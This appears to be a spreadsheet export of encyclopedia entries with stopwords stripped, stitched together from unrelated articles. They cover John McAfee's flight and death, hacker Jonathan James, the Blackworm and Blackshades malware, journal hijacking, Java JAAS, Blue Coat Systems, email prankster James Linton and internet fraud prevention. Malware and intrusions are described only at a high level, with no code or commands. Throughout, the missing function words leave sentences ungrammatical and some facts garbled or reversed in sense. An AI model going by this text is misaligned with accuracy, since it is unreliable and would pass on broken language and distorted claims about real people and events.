barrow, called "extremely paranoid, even bonkers". fled belize rather cooperate.in december 2012, magazine vice accidentally gave away mcafee's location guatemalan resort, photo taken journalists accompanying posted exif geolocation metadata still attached.while guatemala, mcafee asked chad essley, american cartoonist animator, blog could write experience run. appeared publicly guatemala city, unsuccessfully sought political asylum.on december 2012, arrested illegally entering guatemala. shortly afterward, board reviewing asylum plea denied taken detention center await deportation belize.on december 2012, reuters news reported mcafee minor heart attacks detention center hospitalized. lawyer said heart attacks, rather high blood pressure anxiety attacks. mcafee later said faked heart attacks time attorney file series appeals ultimately prevented deportation belize, thus hastening government's decision send back united states.on december 2012, mcafee released deported united states.on november 2018, circuit court orlando, florida, refused dismiss wrongful death lawsuit faull's death. u.s. evasion charges planned extradition january 2019, mcafee announced u.s. authorities, living internationally boat following convening grand jury indict him, wife, four 2020 libertarian party presidential primaries staff evasion charges. time, internal revenue service independently confirmed existence indictment.on october 2020, mcafee arrested spain request united states department justice evasion. june indictment, unsealed upon arrest, alleged earned millions dollars 2014 2018, failed file income returns.on october, u.s. securities exchange commission (sec) filed complaint alleging mcafee bodyguard promoted certain initial coin offerings (icos) fraudulent cryptocurrency pump dump scheme. claims presented impartial investor promoted icos, despite allegedly getting paid million digital assets return.on march 2021, u.s. attorney's office southern district york formally indicted executive adviser charges.mcafee jailed spain, pending extradition united states.on june 2021, spanish national court authorized extradition face charges tennessee; mcafee suspected committed suicide several hours authorization. york extradition case still pending lower spanish court. personal life mcafee married three times. first wife circa 1968 working towards doctorate northeast louisiana state college undergraduate student. their affair expulsion college. married second wife, judy, former flight attendant american airlines, circa 1987; divorced 2002. night mcafee arrived united states deported guatemala december 2012, solicited slept janice dyson, worker years junior south beach, miami beach, florida. they began relationship married 2013. claims saved human traffickers.the couple moved portland, oregon, 2013.in 2012 article mensa bulletin, magazine american mensa, mcafee said developing first commercial antivirus program made "the popular hacking target" "[h]ackers hacking badge honor". cybersecurity, said people computer equipment him, uses pseudonyms setting computers logins, changes address several times day. when asked another occasion personally used mcafee's antivirus software, replied: take off[...]it's annoying."in 2015, resided lexington, tennessee. december 2018, tweeted genetic children". third wife described father's message "father many, loved few". death june 2021, mcafee found dead prison cell brians penitentiary center near barcelona, hours spanish national court ordered extradition united states criminal charges filed tennessee united states department justice division. catalan justice department said "everything indicates" killed hanging. official autopsy confirmed suicide.mcafee's death ignited speculation conspiracy theories possibility murdered. mcafee's death drew comparisons circumstances death american financier jeffrey epstein, found dead august 2019 awaiting trial trafficking charges. several times, mcafee claimed ever found dead hanging, would mean murdered. minutes report death, image letter posted instagram feed (his account subsequently taken down), apparently reference qanon conspiracy theories. these theories referred journalists speculative, "bizarre," "baseless," primarily based mcafee's statements. death, lawyer told reporters regularly maintained contact mcafee prison, signs suicidal intent. mcafee's widow reaffirmed position first public remarks since husband's death, also called "thorough" investigation.on february 2022, spanish court ruled mcafee died suicide. media gringo: dangerous life john mcafee showtime networks documentary portion mcafee's life spent belize. began airing september 2016. covers allegations raping former business partner, allison adonizio, murdering belizean david middleton american expat gregory faull. interview bloomberg's pimm kathleen hayes september 2016, said incidents fabricated, "belize third-world banana republic make story want interviewees, showtime did."in march 2017, reported glenn ficarra john requa would direct film mcafee titled king jungle, written scott alexander larry karaszewski. various points, johnny depp, michael keaton, seth rogen reported taken roles later left project. november 2019, efron reported star journalist furman.on 2017, mcafee wife interviewed news's 20/20 regarding faull's alleged murder. books computer viruses, worms, data diddlers, killer programs, other threats your system. what they are, they work, defend your mac, mainframe, (with colin haynes) martin's press, 1989 secret yamas: spiritual guide yoga, mcafee pub, 2001 fabric self: meditations vanity love, woodland publications, 2001 into heart truth, woodland publications, 2001 beyond siddhis. supernatural powers sutras patanjali, woodland publications, 2001 references further reading davis, joshua december 2012). "john mcafee fled belize, couldn't escape himself". wired. retrieved june 2021. external links appearances c-span john mcafee's website john mcafee imdb</t>
  </si>
  <si>
    <t>Jonathan James</t>
  </si>
  <si>
    <t>jonathan joseph james (december 1983 2008) american hacker gray ethical hacker) first juvenile incarcerated cybercrime united states. south florida native years time first offense years date sentencing. died pinecrest, florida home 2008, self-inflicted gunshot wound. initial department defense intrusion between august 1999, october 1999, james committed series intrusions various systems, including bellsouth miami-dade school system. what brought attention federal authorities, however, intrusion computers defense threat reduction agency (dtra), division united states department defense, primary function analyze potential threats united states america, home abroad. james later admitted authorities installed unauthorized backdoor computer server dulles, virginia, used install sniffer allowed intercept three thousand messages passing dtra employees, along numerous usernames passwords dtra employees, including least official military computers.it later revealed precise software obtained international space station's source code controlling critical life-sustaining elements. according nasa, "the software supported international space station's physical environment, including control temperature humidity within living space." arrest, conviction sentencing james' house raided january 2000, agents department defense, nasa pinecrest police dept. james formally indicted months later. september 2000, entered agreement u.s. attorney lewis: would plead guilty counts juvenile delinquency exchange lenient sentence.james sentenced seven months' house arrest probation eighteen, required write letters apology nasa department defense. also banned using computers recreational purposes. james later violated probation tested positive drug subsequently taken custody united states marshals service flown alabama federal correctional facility ultimately served months.legal experts suggested that, given extent intrusions, could served least years crimes adult. both attorney general janet reno prosecuting attorney lewis issued statements claiming james case proof justice department willing tough juvenile offenders accused cybercrime. death january 2008 department store chain victim massive computer systems intrusion compromised personal credit information millions customers. ring hackers also committed intrusions bj's wholesale club, boston market, barnes noble, sports authority, forever dsw, officemax, dave buster's, reportedly made millionaire group's ringleader, albert gonzalez. though denied done anything, james—who friends hackers involved—was investigated secret service, raided james', brother's, girlfriend's houses. although apparently discovered connection intrusion, discover legally registered firearm, take, notes indicating considered killing himself; james' father would later prone depression. criminal complaint filed hackers mention additional, unnamed conspirator indicted, identified initials "j.j.". 2004, co-conspirator assisted hackers stealing credit card numbers, account numbers, encrypted pins officemax store wi-fi. these numbers later allegedly provided albert gonzalez, "j.j." also opened mail drop. james's father believes "j.j." son. however, plausible initials "j.j." fact referring "jim jones", (hacker) alias believed used stephen watt close friend computer hacker criminal albert gonzalez.on 2008, jonathan james found dead shower self-inflicted gunshot wound head. suicide allegedly motivated belief would prosecuted crimes committed. honestly, honestly nothing tjx," james wrote suicide note, faith 'justice' system. perhaps actions today, letter, send stronger message public. either way, lost control situation, regain control." references external links anonymous interview jonathan james frontline, pbs.org document detailing indictment defaced bellsouth website wayback machine (archived july 2010)</t>
  </si>
  <si>
    <t>Blackworm</t>
  </si>
  <si>
    <t>blackworm internet worm discovered january 2006 infects several versions microsoft windows. also known grew.a, grew.b, blackmal.e, nyxem.e, nyxem.d, mywife.d, tearec.a, cme-24, kama sutra. blackworm spreads mainly sending infected email attachments, also infects computers copying network shares. virus removes antivirus programs remote computers attempting infect them. when first installed, copies windows system directories. uses filenames resemble legitimate windows system files attempt remain hidden. activates third month; first known activation happened february 2006. activation, virus overwrites data files many common types, including word, excel, powerpoint documents; archives; pdfs. destroy files fixed removable drives tries, fails, affect data network drives. also attempts disable antivirus programs removing registry entries automatically deleting antivirus programs directly. virus visits tracking page time infects computer. over 300,000 unique visited site, suggesting least many computers suffered infection. known many remained infected long enough trigger virus’s payload. references external links cme-24 (blackworm) users’ nyxem.e symantec detailed description nyxem.e virus nyxem.e microsoft microsoft description detailed information nyxem.e virus nyxem.e kaspersky labs nyxem.e detailed description manual removal instructions remove blackworm tutorial</t>
  </si>
  <si>
    <t>Blackshades</t>
  </si>
  <si>
    <t>blackshades malicious trojan horse used hackers control infected computers remotely. malware targets computers using operating systems based microsoft windows. according officials, 500,000 computer systems infected worldwide software.in 2014, united states federal bureau investigation (fbi) arrested hundreds people blackshade computer. before crackdown, blackshades sold us$40 hack forums, reportedly generated us$350,000 sales. functionality blackshades infects computer systems downloading onto victim's computer victim accesses malicious webpage (sometimes downloading onto victim's computer without victim's knowledge, known drive-by download) external storage devices, flash drives. blackshades ability infect hack multiple computers release bait hacker make improved version blackshades released shortly original release primary version, hacking organizations like octagonun cyber-sec, decided develop special features coupling software undetectability, ddos flood, backdoor persistence features.blackshades reportedly used remotely access infected computer without authorization. blackshades allows hackers perform many actions infected computer remotely without authorization, including ability access modify files victim's computer. keystrokes victim's computer. access webcam victim. makes infected computers subordinate ddos attack commands, using robots carry extremely effective attacks targets. download execute files victim's computer. victim's computer proxy server.blackshades reportedly used computer hackers little experience script kiddies, hackers programs developed others attack computer systems.blackshades also ransomware. hackers using blackshades restrict access victim's computer demand ransom paid hacker order restriction lifted. detection removal many antivirus programs successfully detect remove blackshades, however hackers using blackshades software usually avoid detection blackshades infections using software obfuscates blackshades binary avoid detection antivirus programs, blackshades organization also sold along blackshades software. blackshades media 2012, citizen reported blackshades target opposition forces syria.in 2015, stefan rigo leeds given 40-week suspended sentence using blackshades people, knew personally. reported paid software using ex-girlfriend's payment card. crackdown 2012, sting operation called "operation card shop", arrests hackers eight countries. arrested michael hogue (also known xvisceral online hacking communities). hogue, co-creator blackshades, arrested indicted charges u.s.c. 1030, commonly known computer fraud abuse act. sentenced five years probation, years suspended prison sentence.in 2014, coordinated worldwide operation combat malware, leading arrest almost hundred people nineteen countries. charges laid united states five individuals: identified developers blackshades three sold software used infiltrate people's computers. exactly searches conducted 1,100 electronic devices seized part operation. according fbi, 500,000 computers countries infected malware. blackshades sold typically us$40, reportedly generated us$350,000 sales. references external links international blackshades malware takedown international blackshades malware takedown guardian blackshades coordinated takedown leads multiple arrests symantec</t>
  </si>
  <si>
    <t>Journal hijacking</t>
  </si>
  <si>
    <t>journal hijacking refers brandjacking legitimate academic journal malicious third party. typically imposter journal sets fraud website purpose offering scholars opportunity rapidly publish research online fee. term hijacked journal refer either fraud legitimate journal. fraudulent journals also known "clone journals". similar hijacking occur academic conferences. background 2012, cyber criminals began hijacking print-only journals registering domain name creating fake website title legitimate journals.the first journal hijacked swiss journal archives sciences. 2012 2013, academic journals hijacked. cases, scammers find victims conference proceedings, extracting authors' emails papers sending fake calls papers.there also instances journal hijacking wherein hijackers take journal's existing domain name journal publisher neglects domain name registration fees time. also confidence trick passing predatory open access publishing references bibliography jalalian, mehrdad; dadkhah, mehdi (2015). "the full story hijacked journals august 2011 june 2015". geographica pannonica. centre evaluation education science (ceon/cees). (2): 73–87. doi:10.5937/geopan1502073j. issn 0354-8724. abalkina, anna june 2021). "detecting network hijacked journals archive". scientometrics. springer science business media llc. (8): 7123–7148. doi:10.1007/s11192-021-04056-0. issn 0138-9130. external links american librarian jeffrey beall's hijacked journal authentic journal list hijacked journal checker</t>
  </si>
  <si>
    <t>Json2Ldap</t>
  </si>
  <si>
    <t>json2ldap json-to-ldap gateway software, written java developed nimbus directory services. provides json-rpc interface clients access ldap compatible directories. json2ldap supports standard ldap directory requests well several extended operations controls. background json2ldap initially conceived lightweight json alternative existing xml-based gateways providing directory service access browsers. first official release 2010. 2011 development software passed nimbus directory services. interface specification json2ldap provides json interface establishing ldap client connections directory servers. client interface: version json-rpc protocol. requests accepted http post. optional support cross-origin resource sharing (cors) requests.supported standard ldap directory operations 4510): bind (authenticate): simple, plain sasl, digest sasl, anonymous search compare entry delete entry modify entry modify distinguished name (dn) unbindsupported extended ldap operations: password modify (rfc 3062) starttls (rfc 4511) (rfc 4532)supported extended ldap controls: authorisation identity bind control (rfc 3829). server-side sorting search results (rfc 2891). simple paged results (rfc 2696). virtual-list-view search control (draft-ietf-ldapext-ldapv3-vlv-09) sub-tree delete (draft-armijo-ldap-treedelete-02).non-standard extensions: secure remote password protocol (srp-6a) authentication. example messages example request message example directory search request: example response message example directory search response: system requirements json2ldap distributed java application archive (war) deployment java servlet container. also json-rpc list ldap software references</t>
  </si>
  <si>
    <t>Crédito</t>
  </si>
  <si>
    <t>crédito local currency started 1995 bernal, province buenos aires, argentina, garage sale, first many neighbourhood barter markets (mercados trueque) emerged argentina economic crisis. operator currency global clubes trueque multirecíproco (rgt), literally "global network multi-reciprocal exchange clubs" simply "global exchange network" (gen). currency started local exchange trading systems (lets) system soon replaced number printed currencies and, experimentation lets called nodine (from dinero, "not money"), finally became crédito, printed currency again.[1]the organized chaordic network barter clubs, clientele well-educated middle class fallen unemployment argentine recession late 1990s. clubs central organ, central administration legislation. clubs decided accept créditos clubs clubs issued créditos. clubs usually issued créditos participant. later phase clubs joined zones networks zones became issuers créditos instead individual clubs. chaordic structure allowed system grow quickly also left system vulnerable fraud. crédito interest-free currency pegged argentine peso, turn pegged dollar time. estimated $400 million goods services traded 2000. survey conducted members economics department harvard university reports personal exchange rate créditos peso 2002-2003 individuals offered goods services currencies.[2]by july 2002 unemployment rate argentina excess approximately population participated rgt. argentina already high unemployment rate years previously. system used argentina worked reasonably well time but, things worsened formal economy, people joined clubs, growing percentage people spent créditos without offering sufficient skills trade return. system suffered hyperinflation counterfeiting. between 2002 2003 government made unemployment insurance available million people, compared million people previously, thereby increased availability peso population stratum using crédito, preference[3] pesos créditos. other complementary currencies argentina time patacón, lecop argentino. argentino never implemented. references "reinventing market: alternative currencies community development argentina". international journal community currency research 2000, volume archived original march 2005. retrieved july 2005. issn 1325-9547 "4.1 survey exchange club participants coordinators (secpc-2002)" (pdf). secondary currency: empirical analysis. archived original (pdf) august 2005. retrieved july 2005. framework study secondary currency" (pdf). secondary currency: empirical analysis. archived original (pdf) august 2005. retrieved july 2005. external links alternative currencies argentina user-created currencies latin america weather recession, argentines revert barter argentina: post-money economy</t>
  </si>
  <si>
    <t>Java Authentication and Authorization Service</t>
  </si>
  <si>
    <t>java authentication authorization service, jaas, pronounced "jazz", java implementation standard pluggable authentication module (pam) information security framework. jaas introduced extension library java platform, standard edition integrated version 1.4.jaas main goal separation concerns user authentication managed independently. while former authentication mechanism contained information code originated signed code, jaas adds marker runs code. extending verification vectors jaas extends security architecture java applications require authentication authorization modules. administration system administrator, jaas consists kinds configuration file: *.login.conf: specifies plug vendor-supplied login modules particular applications *.policy: specifies identities (users programs) granted permissionsfor example, application login.conf file indicating different authentication mechanisms authenticate user: petshopapplication com.sun.security.auth.module.ldaploginmodule sufficient; com.foo.smartcardloginmodule requisite; com.sun.security.auth.module.unixloginmodule required debug=true; application interface application developer, jaas standard library provides: representation identity (principal) credentials (subject) login service invoke application callbacks user things like username password. returns subject service tests subject granted permission administrator. security system integration security system integrator, jaas provides interfaces: provide identity namespace applications attach credentials threads (subject) developing login modules. your module invokes callbacks query user, checks response generates subject. login modules login modules primarily concerned authentication rather authorization form widely used component jaas. login module required implement javax.security.auth.spi.loginmodule interface, specifies following methods: note: subject user attempting initialize: code initialize login module, usually storing parameters passed appropriate fields class. login: actually check credentials provided object implements javax.security.auth.callback interface (e.g. check database). this method could prompt user login password could details previously obtained. important note that, invalid credentials supplied javax.security.auth.login.failedloginexception thrown (rather returning false, indicates login module ignored, potentially allows authentication succeed). commit: identity subject verified, code method sets principal groups (roles) successfully authenticated subject. this method written carefully enterprise applications java application servers often expect relationships principal group objects certain way. this method throw javax.security.auth.login.failedloginexception authentication fails (e.g. user specified incorrect login password). abort: called authentication process fails. method returns false, login module ignored. logout: code executed upon logout (e.g. could remove principal subject could invalidate session).login modules provide single sign (sso) particular protocol/framework (e.g. saml, openid, spnego), check presence hardware security tokens (e.g. token), etc. n-tier application, loginmodules present client side server side. loginmodule (javax.security.auth.spi.loginmodule) login modules written implementing interface; contain actual code authentication. various mechanisms authenticate user credentials. code could retrieve password database compare password supplied module. logincontext (javax.security.auth.login.logincontext) login context core jaas framework kicks authentication process creating subject. authentication process proceeds, subject populated various principals credentials processing. subject (javax.security.auth.subject) subject represents single user, entity system words, client– requesting authentication. principal (java.security.principal) principal represents face subject. encapsulates features properties subject. subject contain multiple principals. credentials credentials nothing pieces information regarding subject consideration. they might account numbers, passwords, certificates etc. credential represents important information, interfaces might useful creating proper secure credential javax.security.auth.destroyable javax.security.auth.refreshable. suppose successful authentication user populate subject secret form credential) subject execute critical services, credential removed specific time. case, might want implement destroyable interface. refreshable might useful credential limited timespan valid. also apache shiro keystore oacc references external links jaas tutorial jguard open source project secure standalone applications based jaas musser, john; feuer, paul (september 2002). "all jaas". javaworld. retrieved 2020-07-20. spnego library open source lgpl project relies jaas framework simplify authentication authorization</t>
  </si>
  <si>
    <t>Blue Coat Systems</t>
  </si>
  <si>
    <t>blue coat systems company provided hardware, software, services designed cybersecurity network management. 2016, acquired folded symantec. company known cacheflow 2002. company broad security portfolio including hardware, software services." company best known gateway appliances scan internet traffic security threats, authenticate users manage encrypted traffic, well products monitor filter employee internet activity. also produced consumer products, parental control software. company's products initially sold internet service providers, later products intended large companies. history march 1996, company founded cacheflow, inc. redmond, washington michael malcolm, computer scientist professor university waterloo, pruskowski, doug crow. company initially raised million seed money dozen angel investors.the company's goal develop appliances would increase website speed storing frequently accessed data cache.in october 1996, benchmark capital purchased company $2.8 million, equivalent price 87.5 cents share. february 1997, company raised $5.1 million. december 1997, u.s. venture partners acquired company million.in 1997, company moved headquarters silicon valley.in january 1998, company released first product, cacheflow 1000. cached website objects users likely repeatedly, increase load speed. october 1999, cacheos operating system released.in april 1998, company released cacheflow 100.in mid-1998, dot-com bubble, company made first sales, earning $809,000 three months, investors started pushing initial public offering (ipo).in march 1999, technology crossover ventures invested $8.7 million company, equivalent price $4.575 share.in september 1999, company released cacheflow 500, list price $9,995. competitive review caching appliances magazine gave cacheflow editor's choice. editor said "excellent performance", "plug-and-go" setup, "good management tools". review noted "most noteworthy features" caching object pipelining techniques, allowed page data delivered parallel, rather sequential, streams.in early november 1999, marc andreessen invested $3.1 million shares, price $11.04 share.on november 1999, peak dot-com bubble, company became public company initial public offering, raising $132 million. shares rose fivefold first trading. however, company profitable product unproven. time, company $3.6 million revenue $6.6 million losses prior months. company initially hoped price shares $11-13 raise million strong demand, priced shares each. month later, traded high $182 each.in 1999, board directors member andrew rachleff benchmark capital, investor, brought brian nesmith, sold company, ipsilon networks, nokia $120 million, chief executive officer.in 2000, introduced cacheflow server accelerator product family, offloads content delivery tasks servers. tests network world found server accelerator increased website load speed eight-fold. cacheflow client accelerator product family also introduced 2000. company's first product family corporate networks, caching multimedia content directly corporate network.revenues grew million 1998, million 1999 million 2001. already overall market caching caching appliance market still profitable.in march 2000, company integrated products akamai technologies.in 2000, company updated cacheflow cache multimedia content, including realnetworks' realsystem, microsoft's windows media apple's quicktime formats.in june 2000, company acquired springbank networks, internet device company, $180 million.in december 2000, company acquired entera, digital content streaming company, $440 million.in 2001, features specifically streaming media introduced name "ciq".later 2001, company renamed blue coat systems focus security appliances simultaneously released sg800. appliance behind corporate firewalls filter website traffic viruses, worms harmful software. custom operating system called security gateway provided many security features partners, like symantec trend micro.the company lost value october 2000 march 2001 dot-com bubble burst. company continued lose money. 2002, several competing internet caching companies abandoned market, slow adoption caching technology cacheflow's revenues came security products.in february 2002, company closed redmond, office laid workers there. around dozen redmond workers offered transfers sunnyvale, office.in april 2002, company launched fifth version operating system. security gateway 600/6000 series company's newest product family. range security features, authentication, internet policies, virus scanning, content filtering, bandwidth restrictions streaming video applications.in august 2002, company started adding security features.also august 2002, company changed name blue coat systems. name intended evoke image police officer guard. focusing internet security appliances. products primarily used control, monitor secure internet employees. example, company could limit employee access online gaming video streaming, well scan attachments viruses. shift focus followed smaller losses revenues first eventually company growth. losses 2002 rename $247 million, half prior year's losses. 2003, company employees $150 million annual revenue.in 2003, products introduced small medium-sized businesses (smbs) users bundles websense; secure computing, although websense partnership later least partially dismantled vendors "slinging other" community. this followed second generation proxysg product family, added security features instant messaging. review eweek said proxysg line effective easy deploy, ongoing maintenance fees expensive.in october 2003, company acquired ositis software, maker antivirus appliances, $1.36 million.in july 2004, company acquired cerberian, filtering company, $17.5 million.in 2005, company introduced anti-spyware appliance called spyware interceptor following year announced upcoming optimization products. this followed ssl-vpn security appliances secure remote connections.in 2005, company profitable first time.in 2006, company introduced free web-tool, protection, monitor internet traffic, block certain websites, identify phishing scams. november 2008 review, world gave 4.25 stars.in march 2006, company acquired permeo technologies, point security company, million.in june 2006, company acquired netcache assets netapp, involved proxy caching, million.in june 2008, company acquired packeteer, engaged optimization, $268 million.in 2009, company introduced plugin packetshaper throttle applications spotify. review packetshaper 12000 gave four five stars. review said "you find superior traffic management anywhere else," "the hardware platform could date considering price."in november 2009, company went restructuring included layoffs 1,500 employees closing facilities latvia, jersey netherlands.in february 2010, company acquired software solutions, research development firm based bangalore, $5.25 million.in august 2010, michael borman named president company.in august 2011, michael borman fired failing meet performance goals replaced greg clark.in december 2011, thoma cressey bravo acquired company $1.3 billion.in march 2012, david murphy named chief operating officer president company.in december 2012, company acquired crossbeam systems, maker x-series security appliances.in 2013, company acquired solera networks, involved data security.in december 2013, company acquired norman shark, anti malware firm.in 2014, elastica's technology incorporated blue coat products, audit subscription service merged blue coat appfeed proxysg gateways.in june 2015, company acquired perspecsys, involved cloud security.also march 2015, company integrated technologies acquisitions norman shark solera networks create cloud-based product family called global intelligence network.also march 2015, company pressured security researcher raphaël rigo canceling talk syscan '15. although raphaël's talk contain information vulnerabilities proxysg platform, company still cited concerns talk going "provide information useful ongoing security assessments proxysg blue coat." canceling talk harsh criticism various prominent security researchers professionals alike generally welcome technical information various security products widely used.in march 2015, bain capital acquired company thoma bravo $2.4 billion. bain indicated hoped launch another several months later, anonymous sources said company looking investment banks purpose.in august 2015, company launched alliance ecosystem endpoint detection response (edr) share information security threats across vendors companies. first channel program started march cloud ready partner program announced following april.in november 2015, company acquired elastica, involved cloud security, $280 million. 2015, company $200 million annual profits $600 million revenues, increase 2011.on june 2016, company filed plans initial public offering. however, june 2016, company abandoned plans announced symantec agreed acquire company $4.65 billion. acquisition completed august 2016 company's products integrated symantec.blue coat greg clark named symantec blue coat michael named president symantec. repressive regimes blue coat devices known "dual-use" technology, used defend corporate networks governments censor monitor public's internet traffic. appliances types encrypted traffic, block websites record website traffic.in october 2011, u.s. government examined claims made telecomix, hacktivist group, syria using blue coat systems products internet censorship. telecomix released 54gb data alleged taken blue coat gateway appliances depict search terms, including "israel" "proxy", blocked country using appliances. company later acknowledged systems used syria, asserted equipment sold intermediaries dubai iraqi governmental agency.despite systems consistently sending "heartbeat" pings directly back blue coat, company claimed monitoring logs identify country appliance communicating. blue coat announced would halt providing updates, support services systems operating syria. april 2013, bureau industry security announced $2.8 million civil settlement computerlinks fzco, dubai reseller, violations export administration regulations related transfer syria blue coat products.the company's devices also used block public viewing certain websites bahrain, qatar, u.a.e., among others. 2013, citizen published reports regarding company's devices found countries known using technology violate human rights. identified countries using blue coat devices, including known censoring surveilling citizens' internet activity, china, egypt, russia, venezuela. however, remains unclear exactly technologies used, experts tools could empower repressive governments opponents." also kaleidescape references</t>
  </si>
  <si>
    <t>James Linton (hacker)</t>
  </si>
  <si>
    <t>james linton social engineer email prankster known duping high-profile celebrities politicians. five months 2016 2017, "lazy anarchist" known twitter alias sinon_reborn created look-alike email accounts emailed high-profile individuals political, financial, entertainment industries iphone background linton former designer front developer. suspended bosses suspected emailing victims work. lives manchester partner three cats.his moniker sinon_reborn comes sinon, name greek soldier persuades trojans accept trojan horse, basis eponymous computing trick utilised.he revealed identity media september 2017 later became threat researcher speaker email security firm agari. prank spree 2017, linton began spree staley, barclays chairman john mcfarlane, pranked acrostic alluding whistleblower investigation. days later, sent sexist remarks mark carney, governor bank england invitation fake soiree. this tightening barclay's email security procedures.in june, impersonating jeremy corbyn's press secretary, british politician diane abbott tricked commenting health.shortly after, tricked lloyd blankfein, goldman sachs making president trump, citigroup banking chiefs michael corbat stephen bird links previous pranks corresponded james gorman, morgan stanley story catching salmon.in late june, right-wing media personality katie hopkins, tricked joining fictional show "adders basket" debating feminists, liberals vegans.in august, targeted white house. posing jared kushner tricked senior cyber security advisor authenticity, taunted media chief anthony scaramucci chief staff reince priebus fired, invited homeland security advisor bossert soiree, joked eric trump dad's similarities putin. personal lawyer donald trump michael cohen persuaded tweet photograph hidden jared kushner's lawyer abbe lowell incorrectly forwarded request senate intelligence committee asking kushner's undisclosed private email account fake account. lawyer cobb press secretary sarah sanders corresponded, joking droning journalist natasha bertrand.in early august, former home secretary amber rudd briefly corresponded personal address upcoming announcements fake advisor account.later august, breitbart editors alex marlow joel pollak commented would steve bannon's 'dirty work' fake steve bannon account, ousting jared kushner ivanka trump shared personal smear private lives.in september, former united states deputy attorney general jamie gorelick briefly fell fake emails client jared kushner reveal anything confidential.in october, linton posing disgraced hollywood producer harvey weinstein, confessing regrets actions former lawyers lanny davis lisa bloom.later october, targeted shark tank personality robert herjavec company ceo, inviting toga party. later fake account copied official financial projection documents.in late october, national cyber security centre technical director levy targeted fake industry event, however levy correctly identified unexpected link mail.com. linton asked levy co-write blog experience.linton's last prank targeting conservative media pundit coulter, posing sheriff david clarke persuading review article immigration. other pranks kevin spacey, american actor, producer, singer alan stewart, tesco john allan, tesco dennis muilenburg, ceo, boeing liddy, board member boeing norman tebbit, politician boris johnson, secretary state foreign affairs. fake johnson told tebbit fuck yourself". jessica shears, love island reality star james woods hollywood actor producer ezra levant, rebel media tucker carlson brian kilmeade news external links emailprankster.com personal site references</t>
  </si>
  <si>
    <t>Internet fraud prevention</t>
  </si>
  <si>
    <t>internet fraud prevention stopping various types internet fraud. many different ways committing fraud internet, stolen credit cards, identity theft, phishing, chargebacks, users internet, including online merchants, financial institutions consumers make online purchases, must make sure avoid minimize risk falling prey scams.the speed sophistication online fraudulent actors continues grow. according 2017 study conducted lexisnexis, $1.00 lost fraud costs organizations (merchants, credit card companies institutions) $2.48 $2.82 "that means fraud costs roughly times actual loss itself."three constituencies direct interest preventing internet fraud. first, consumer susceptible giving away personal information phishing scam, acquired rogue security software keylogger. 2012 study, mcafee found computers sort antivirus protection, making easy targets scams. business owners website hosts also engaged ongoing battle ensure users services legitimate. websites file hosting must work verify uploaded files check viruses spyware, modern browsers perform virus scans prior saving file (there must virus scanner previously installed system). however, files found unclean user falls prey one. financial institutions, credit card companies, refund online customers merchants defrauded also strong interest mitigating internet fraud risk. history internet fraud began appearing 1994 start e-commerce. first trend seen “famous names” commit fraud. using method, person committing fraud would stolen credit cards popular celebrity time’s name. this highly unsophisticated plan successful internet possibility fraud considered. eventually internet merchants implemented rules confirm card user name. following “famous names” strategies technical attacks hackers created card-generator applications came real credit card numbers. attacks commonly targeted toward vendor. merchants cross-merchant activity credit card associations reported after 1996 fraudulent users went internet test status stolen credit cards. 1998, internet filled e-commerce sites. fraudsters began “dummy” merchant sites could harvest credit cards site. before charge-backs rolled would shut doors website leave country. soon trend started mass theft identities internet information provided online freedom information act. counter-methods merchants developed consumer accounts. merchant would consumer account first time consumer made purchase. following creation account, merchant would perform series third-party checks validate information provided consumer. auction sites like ebay ubid gained popularity, fraud methods arrived specifically targeting merchant community. from selling bogus goods misleading consumer, fraudsters continued take advantage consumers. credit card fraud credit card fraud unauthorized credit card make transaction. this fraud range using credit card obtain goods without actually paying, performing transactions authorized card holder. credit card fraud serious offense, punished charge identity theft. majority type fraud occurs counterfeit credit cards, using cards lost stolen. approximately .01% transactions deemed fraudulent, approximately americans reported type credit card fraud lifetimes.while many systems place card provider identify fraud, card holder left ultimate responsibility. preemptive steps reduce chances fraud include installing anti-virus software, keeping maintaining current records, reviewing statements charges regularly. objective provide first defense spotting fraudulent charges. exercising caution online sites, especially suspicious non-established sites, well foreign countries also advisable. legitimacy websites verified. checking better business bureau first step company established themselves. once website, user check security encryption software website utilizes. padlock left url, sometimes found signify additional security implemented. physical address company, sending email contact addresses verify reliability company. even trusted sites, important diligent navigated away site. other safe practices include cautious account number distribution, keeping credit cards separate wallet purse, keeping constant sight credit cards, drawing lines blank spaces total receipts. accounts saved card information, important strong password numbers symbols. using different passwords different sites, also strongly encouraged.if card lost stolen, card holder must report immediately, even fraud detected yet. once card reported lost stolen, card-holder responsible erroneous charges. identity theft identity theft, also called identity fraud, crime someone steals uses another person’s personal information data without permission. crime usually committed economic gain. stolen personal data includes social security number's (ssn), passport numbers, credit card numbers, easily used another person profit. serious crime negative effects person's finances, credit score reputation. there three specific types identity theft aside broad term. tax-related identity theft criminal uses someone else's refund job. victim type theft must contact irs. child identity theft criminal uses child’s apply governmental benefits, open bank accounts, apply loan. medical identity theft criminal uses someone else's name health insurance doctor, prescription various medical needs.fortunately, precautions consumers take prevent identity theft. there simple ways avoid becoming victim identity fraud easy remember acronym scam. scam reminds stingy giving personal information others check financial information regularly recognize something strange occurred copy credit report often, maintain careful financial records. necessary aware phishing always cautious giving personal information e-mail, website phone. also sure phone number, name mailing address registered bank account correct cases bank statements sent false addresses identities stolen. check bank statements regularly sure charges account recognize.individuals experiencing identity theft take immediate steps limit damage finances personal life. first step contact three national credit reporting companies place initial fraud alert. this done contacting national credit reporting company, asking fraud alert credit file, confirming notify companies change. next step order free credit reports three national credit reporting companies. lastly, report identity theft print identity theft affidavit file police report copy report. phishing phishing scam e-mail user duped revealing personal confidential information scammer (phisher) illicitly. communications purporting popular social sites, auction sites, banks, online payment processors administrators commonly used lure unsuspecting public. phishing emails contain links websites infected malware. phishing typically carried email spoofing instant messaging, often directs users enter details fake website whose look feel almost identical legitimate one. there four main type phishing techniques: link manipulation, filter evasion, website forgery, phone phishing. legislation, user training, public awareness, technical security measures attempts control growing number phishing attacks. damage caused phishing ranges denial access email substantial financial loss. estimated 2004 2005, approximately million computer users united states suffered losses caused phishing, totaling approximately us$929 million. united states businesses lose estimated us$2 billion year clients become victims.as early 2007, adoption anti-phishing strategies businesses needing protect personal financial information low. there several different techniques combat phishing, including legislation technology created specifically protect phishing. these techniques include steps taken individuals, well organizations. strategy combating phishing train people recognize phishing attempts, deal them. education effective, especially training provides direct feedback. people take steps avoid phishing attempts slightly modifying browsing habits. when contacted account needing "verified" topic used phishers), sensible precaution contact company email apparently originates check email legitimate. alternatively, address individual knows company's genuine website typed address browser, rather trusting hyperlinks suspected phishing message. nearly legitimate e-mail messages companies customers contain item information readily available phishers. customer discretion separate genuine emails phishing emails prevent phishing attacks. anti-phishing working group, industry enforcement association, suggested 